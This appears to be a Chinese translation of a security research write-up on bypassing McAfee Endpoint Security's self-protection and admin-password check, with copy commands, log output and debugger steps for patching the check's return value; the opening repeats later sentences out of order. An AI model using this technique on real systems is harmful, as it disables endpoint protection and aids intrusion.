如何关掉迈克菲杀毒软件:利用Mcafee管理工具绕过McAfee杀毒软件
如何关掉迈克菲杀毒软件:利用Mcafee管理工具绕过McAfee杀毒软件如果提供了正确的密码,则RAX寄存器的值为0:因为我很懒,我所以选择了第2项。当输入错误的密码时,密码检查函数会将错误代码放入RAX寄存器:10/12/2019 01:11:46.400 PM ESConfigTool(5476.8840) <admin> ESConfigTool.ESConfigTool.Error (ImportExportUtil.cpp:677): Failed to unlock client settings with user supplied password TriggerAction failed 让我们在调试器中搜索特定字符串,看看能否找到这个错误的来源。现在我们把这个位置设为断点,再运行一次,看看在断点之前发生了什么。我们可以看到一个函数调用了一个名为BLInvokeMethod的东西,后面还跟着一个没有执行的跳转:此时,我们有两个选
12/10/2019 12:47:09 mfeesp(2204.6392) <SYSTEM> ApBl.SP.Activity: DESKTOP-DNUK2R5\admin ran X64DBG.EXE which attempted to access ESCONFIGTOOL.EXE violating the rule "Core Protection - Protect McAfee processes from unauthorized access and termination" and was blocked. For information about how to respond to this event see KB85494. 12/10/2019 12:47:09 mfeesp(2204.5404) <SYSTEM> ApBl.SP.Activity: DESKTOP-DNUK2R5\admin ran X64DBG.EXE which attempted to access ESCONFIGTOOL.EXE violating the rule "Core Protection - Protect McAfee processes from unauthorized access and termination" and was blocked. For information about how to respond to this event see KB85494.
看来我们首先需要绕过这种自我防御机制。
Microsoft Windows [Version 10.0.16299.15] (c) 2017 Microsoft Corporation. All rights reserved. C:\Users\admin>mkdir \temp C:\Users\admin>cd \temp C:\temp>copy "C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe" . 1 file(s) copied. C:\temp>copy "C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\blframework.dll" . 1 file(s) copied. C:\temp>copy "C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\EpSecApiLib.dll" . 1 file(s) copied. C:\temp>copy "C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\McVariantExport.dll" . 1 file(s) copied. C:\temp>copy "C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\LogLib.dll" . 1 file(s) copied. C:\temp>
没错,只要像如上所述疯狂复制文件,你就可以绕过自我防御,对软件进行调试。现在,让我们开始调试吧。
先让我们看看当使用错误的密码时会发生什么,也许会有一些字符提示:
C:\Windows\system32>"C:\Program Files\McAfee\Endpoint Security\Endpoint Security Platform\ESConfigTool.exe" /export C:\Export.xml /module TP /unlock startrek /plaintext There were some errors while executing command. Please refer to Endpoint Security logs for details C:\Windows\system32>
嗯,没什么特别的。不过McAfee的日志文件提供了更多信息:
10/12/2019 01:11:46.400 PM ESConfigTool(5476.8840) <admin> ESConfigTool.ESConfigTool.Error (ImportExportUtil.cpp:677): Failed to unlock client settings with user supplied password TriggerAction failed
让我们在调试器中搜索特定字符串,看看能否找到这个错误的来源。
现在我们把这个位置设为断点,再运行一次,看看在断点之前发生了什么。我们可以看到一个函数调用了一个名为BLInvokeMethod的东西,后面还跟着一个没有执行的跳转:
此时,我们有两个选择:
- 进入密码检查函数,看看它是如何工作的,并尝试破解密码。
- 直接更改检查函数的返回值。
因为我很懒,我所以选择了第2项。当输入错误的密码时,密码检查函数会将错误代码放入RAX寄存器:
如果提供了正确的密码,则RAX寄存器的值为0:
